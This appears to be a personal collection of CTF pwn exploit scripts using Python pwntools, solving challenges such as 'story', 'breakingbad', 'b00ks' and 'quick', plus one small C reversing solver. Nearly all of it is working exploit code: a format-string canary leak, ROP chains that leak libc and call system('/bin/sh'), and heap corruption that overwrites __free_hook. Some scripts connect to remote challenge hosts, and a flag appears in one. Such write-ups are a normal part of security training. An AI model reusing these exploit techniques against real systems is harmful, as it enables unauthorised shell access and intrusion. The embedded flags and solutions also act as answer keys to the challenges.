io.recvuntil('How many times do you want to calculate:')
io.sendline('255')
for i in xrange(0,16):
io.recvuntil('5 Save the result\n')
io.sendline('3')
io.recvuntil('input the integer x:')
io.sendline(str(tempnum))
io.recvuntil('input the integer y:')
io.sendline('1')
for j in p:
io.recvuntil('5 Save the result\n')
io.sendline('1')
io.recvuntil('input the integer x:')
io.sendline(str(ct.c_int32(j).value))
io.recvuntil('input the integer y:')
io.sendline('0')
io.recvuntil('5 Save the result\n')
io.sendline('5')
io.interactive()
io.close()
西湖论剑_story
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './story'
#p = process(name)
p = remote('ctf2.linkedbyx.com',10955)
elf= ELF(name)
#libc = ELF('./libc_32.so.6')
if args.G:
gdb.attach(p)
p.recvuntil('Please Tell Your ID:')
p.sendline('aaaa%15$p')
p.recvuntil('aaaa')
x = p.recv()
canary = int(x[0:18],16)
pop_rdi_addr = 0x400bd3
main = 0x400876
pay = 136 * 'a' + p64(canary) + 'q'*8 + p64(pop_rdi_addr) + p64(elf.got['__libc_start_main']) + p64(elf.plt['puts']) + p64(main)
#p.recvuntil('You can speak your story:\n')
p.sendline('200')
p.recvuntil('You can speak your story:\n')
p.sendline(pay)
__libc_start_main_addr = u64(p.recv(6) + '\x00\x00')
system_addr = __libc_start_main_addr + 0x24c50
pay1 = "/bin/sh;%p"
p.recvuntil('Please Tell Your ID:')
p.sendline(pay1)
p.recvuntil('/bin/sh;')
binsh_addr = p.recv()
binsh_addr = int(binsh_addr[0:15],16)
pay2 = 136 * 'a' + p64(canary) + 'q'*8 + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)
#p.recvuntil('You can speak your story:\n')
p.sendline('200')
p.recvuntil('You can speak your story:\n')
p.sendline(pay2)
print "canary: " + hex(canary)
print "__libc_start_main: " + hex(__libc_start_main_addr)
print "system_addr: " + hex(system_addr)
print "binsh_addr: " + hex(binsh_addr)
p.interactive()
# flag{35d06db7c9b25265da7ee6a384ebef5a}
i春秋_breakingbad
from pwn import *
import sys
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './break'
p = process(name)
#p = remote('106.75.2.53',10008)
elf= ELF(name)
#libc = ELF('./bc.so.6')
if args.G:
gdb.attach(p)
#0x804863c
p.recvuntil("Yo, what's your name:\n")
pay = 'b'*12 + p32(elf.plt['puts']) + p32(0x8048470) + p32(elf.got['puts']) + 'aaa'
p.sendline(pay)
#Methamphetamine
p.recvuntil('aaa\n')
p.sendline('Methamphetamine' + '\xff\xff') #整数溢出
p.recvuntil('packing drugs...\n')
puts_addr = u32(p.recv(4))
system_addr = puts_addr - 0x2a540
success("puts_addr: " + hex(puts_addr))
success("system_addr: " + hex(system_addr))
p.recvuntil("Yo, what's your name:\n")
p.sendline('c'*12 + p32(elf.plt['read']) + p32(system_addr) + p32(0) + p32(elf.bss()+100) + p32(8) + 'sir')
p.recv()
p.sendline('Methamphetamine' + '\xff\xff')
p.sendline('/bin/sh\x00')
p.interactive()
i春秋_3.7Z
from pwn import *
def login(data):
payload = ''
for i in range(len(data)):
payload += chr(i^ord(data[i]))
return payload
#p = process('./http')
p = remote( '106.75.2.53',80)
payload = 'User-Agent: '+login('useragent')
print payload
payload += 'token: '+'/bin/sh'
payload += '\r\n\r\n'
p.send(payload)
p.interactive()
p.interactive()
x计划_littlenotebook
from pwn import *
import sys
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './littlennotebook'
p = process(name)
elf= ELF(name)
if args.G:
gdb.attach(p)
def add(num,data):
p.recvuntil('your choice?\n')
p.sendline("1")
p.recvuntil('enter the lenth of notebook:\n')
p.sendline(str(num))
p.recvuntil('input the content:')
p.sendline(str(data))
def edit(i,num,data):
p.recvuntil('your choice?\n')
p.sendline("2")
p.recvuntil('enter the index of notebook:\n')
p.sendline(str(i))
p.recvuntil('enter the lenth of notebook:\n')
p.sendline(str(num))
p.sendline(str(data))
def delete(i):
p.recvuntil('your choice?\n')
p.sendline("3")
p.recvuntil('enter the index:\n')
p.sendline(str(i))
def show(i):
p.recvuntil('your choice?\n')
p.sendline("4")
p.recvuntil('enter the index:\n')
p.sendline(str(i))
#0x4009A7
#0x60209C
add(20,'a'*8)
add(20,'b'*8)
add(20,'c'*8)
delete(2)
delete(1)
pay1 = 'a'*24 + p64(0x21) + p64(0x60209C)
edit(0,40,pay1)
add(20,'/bin/sh\x00')
pay2 = p64(0x0000001400000002) + p64(0x60201800000000)
add(20,pay2)
show(0)
p.recvuntil('0:')
free_addr = u64(p.recv(6) + '\x00\x00')
lib_add = free_addr - 0x82ba0
system_addr = lib_add + 0x42510
success("free_addr: " + hex(free_addr))
success("lib_add: " + hex(lib_add))
success("system_addr: " + hex(system_addr))
edit(1,20,'/bin/sh\x00')
edit(0,8,p64(system_addr))
delete(1)
p.interactive()
Asis CTF 2016 b00ks
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './b00ks'
p = process(name)
#p=remote('chall.pwnable.tw', 10103)
elf= ELF(name)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if args.G:
gdb.attach(p)
def creat(nsize,ndata,dsize,data):
p.recvuntil('> ')
p.sendline('1')
p.recvuntil('Enter book name size: ')
p.sendline(str(nsize))
p.recvuntil('Enter book name (Max 32 chars): ')
p.sendline(str(ndata))
p.recvuntil('Enter book description size: ')
p.sendline(str(dsize))
p.recvuntil('Enter book description: ')
p.sendline(str(data))
def delete(i):
p.recvuntil('> ')
p.sendline('2')
p.recvuntil('Enter the book id you want to delete: ')
p.sendline(str(i))
def edit(i,data):
p.recvuntil('> ')
p.sendline('3')
p.recvuntil('Enter the book id you want to edit: ')
p.sendline(str(i))
p.recvuntil('Enter new book description: ')
p.sendline(data)
def show():
p.recvuntil('> ')
p.sendline('4')
def change(data):
p.recvuntil('> ')
p.sendline('5')
p.recvuntil('Enter author name: ')
p.sendline(data)
#泄露heap地址
p.recvuntil('Enter author name: ')
p.sendline('a'*28 + 'q'*4)
creat(128,'b',32,'c')
creat(0x21000,'/bin/sh\x00',0x21000,'/bin/sh\x00')
show()
p.recvuntil('qqqq')
heap_addr = u64(p.recv(6) + '\x00\x00')
#泄露libc地址
pay1 = p64(1) + p64(heap_addr + 0x38) + p64(heap_addr - 0x30) + p64(0x32)
edit(1,pay1)
change('a'*28 + 's'*4)
show()
p.recvuntil('Name: ')
libc_addr = u64(p.recv(6) + '\x00\x00') - 0x59c010
free_hook = libc_addr + 0x3b68e8
#one_gadget = libc_addr + 0x4239e # 0x423f2 #0xe317e
system_addr = libc_addr + 0x42510
success("heap_aadr: " + hex(heap_addr))
success("libc_addr: " + hex(libc_addr))
success("free_hook: " + hex(free_hook))
success("system_addr: " + hex(system_addr))
#将free_hook地址内容写为system_addr,也可以写为one_gadget_addr
pay2 = p64(1) + p64(heap_addr + 0x38) + p64(free_hook) + p64(0x32)
edit(1,pay2)
pay3 = p64(system_addr) + p64(system_addr)
edit(1,pay3)
#getshell
delete(2)
p.interactive()
WhaleCTF_逆向练习
#include<stdio.h>
#include<string.h>
int main()
{
int esi,bl,ebx,i;
char flag[0x12];
char str[] = "sKfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138";
int num[] = {0x1,0x4,0xe,0xa,0x5,0x24,0x17,0x2a,0xd,0x13,0x1c,0xd,
0x1b,0x27,0x30,0x29,0x2a};
for(i=0;i<0x11;i++)
{
flag[i] = str[num[i]];
}
printf("flag: %s",flag);
// e2s6ry3r5s8f61024
return 0;
}
*ctf_quick
from pwn import *
import struct
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './quick'
#p = process(name)
p=remote('34.92.96.238',10000)
elf= ELF(name)
libc = ELF('./libc.so.6')
if args.G:
gdb.attach(p)
p.recvuntil('how many numbers do you want to sort?\n')
p.sendline('2')
pay1 = str(elf.plt['printf']) + '\x00'*(16-len(str(elf.plt['printf']))) + p32(0x2) + p32(0x0) + p32(0x0) + p32(0x804a024) + 'a'*16 + p32(elf.plt['puts']) + p32(0x8048816) + p32(0x804a02c)
p.recvuntil('the 1th number:')
p.sendline(pay1)
pay2 = '134514016' + '\x00'*7 + p32(0x2) + p32(0x1) + p32(0x1) + p32(0x804a018-4)
p.recvuntil('the 2th number:')
p.sendline(pay2)
p.recvuntil('Here is the result:')
x = p.recv()
lib_main_addr = u32(x[64:68])
libc_addr = lib_main_addr - libc.symbols['__libc_start_main'] #0x18d90
system_addr = libc_addr + libc.symbols['system'] #0x3cd10 #
binsh_addr = libc_addr + next(libc.search('/bin/sh')) #0x17b988 #
print(hex(libc.symbols['__libc_start_main']))
#p.recvuntil('how many numbers do you want to sort?\n')
p.sendline('1')
x = struct.unpack("i",p32(system_addr))
x = x[0]
print("x: " + str(x))
pay2 = str(x) + '\x00'*(16-len(str(x))) + p32(0x2) + p32(0x1) + p32(0x1) + p32(0x804a024) + 'a'*16 + p32(system_addr) + p32(0x8048816) + p32(binsh_addr)
p.recvuntil('the 1th number:')
p.sendline(pay2)
success("lib_main_addr: " + hex(lib_main_addr))
success("libc_addr: " + hex(libc_addr))
success("system_addr: " + hex(system_addr))
success("binsh_addr: " + hex(binsh_addr))
p.interactive()